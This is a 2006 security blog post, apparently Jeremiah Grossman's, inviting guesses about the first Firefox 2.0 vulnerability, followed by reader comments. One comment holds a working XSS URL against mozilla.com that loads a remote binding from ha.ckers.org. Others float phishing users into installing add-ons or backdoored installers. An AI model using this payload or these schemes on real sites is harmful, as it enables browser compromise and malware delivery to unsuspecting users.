Monday, October 23, 2006

Place your bets on the first Firefox 2 vuln

On the heels of the Internet Explorer 7 release comes the much anticipated Firefox 2.0, officially released tomorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say 3 days; post your guess below.

18 comments:

Anonymous said...

48 hours.

Anonymous said...

48 hours.

maluc said...

I'll go with 5 days.. and zero for their website

http://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
(easier to just click my name)

maluc said...

Well, never mind, Blogger's a pain in multiple ways.. but you get the idea..

*points to:*
http://sla.ckers.org/forum/read.php?3,44,2090,page=21#msg-2090

RSnake said...

Maluc, you rock...

Using that, you can potentially load .xpi through phishing... eesh!

I give it less than a week (and if I worked for Microsoft I'd make sure of that).

RSnake said...

Never mind, you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.

maluc said...

Heh, I'll see what I can do..

But in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that download a backdoored install file could work pretty well too. That's a badly worded sentence but you get the idea..

maluc said...

Well.. I found one on addons.mozilla.org .. and persistent. But don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org

So it can definitely be used for phishing if they can be convinced to click install.. but I'm not sure about an automatic way

Anonymous said...

less than that: http://lcamtuf.coredump.cx/ffoxdie.html

Anonymous said...

The exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.

You can annoy someone, but it does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514

Anonymous said...

Not that that's an excuse for leaving a highly publicised crash in the browser.

Anonymous said...

ffoxdie also affects IE7

Disenchant / Sven Vetsch said...

What do you call a vuln? Do you simply mean security related bugs or must there be for example a code execution possibility?

Regards,
Sven

Daniel said...

24 hours for 1st vuln disclosure
32 hours for 1st p0c
48 hours for 1st use of above vuln by phishers/spammers
52 hours for 1st moan by security blog
53 hours for 1st moan by nerd camp

Call me old, but history repeats itself when it comes to software :0)

Jeremiah Grossman said...

Either is fine by me. No need to quibble over semantics.

Sven Vetsch / Disenchant said...

Ok, let's start with something not so difficult. I've posted on my blog at www.disenchant.ch two ways someone can bypass the new phishing filter very easily.

I found these two ways in about 30 minutes so it shouldn't be such a problem to find more ways.

PS: The first one isn't very interesting, I know :P

Regards,
Sven

Sven Vetsch / Disenchant said...

It seems like there was an anomaly in my Firefox. Option 2 will not work in the way I described on my blog. It's interesting anyway that the message which says that it's a phishing site pops up about one second later than it does if you directly navigate to the same site. Sorry for the false alarm :(

Anonymous said...

4 days

- zeno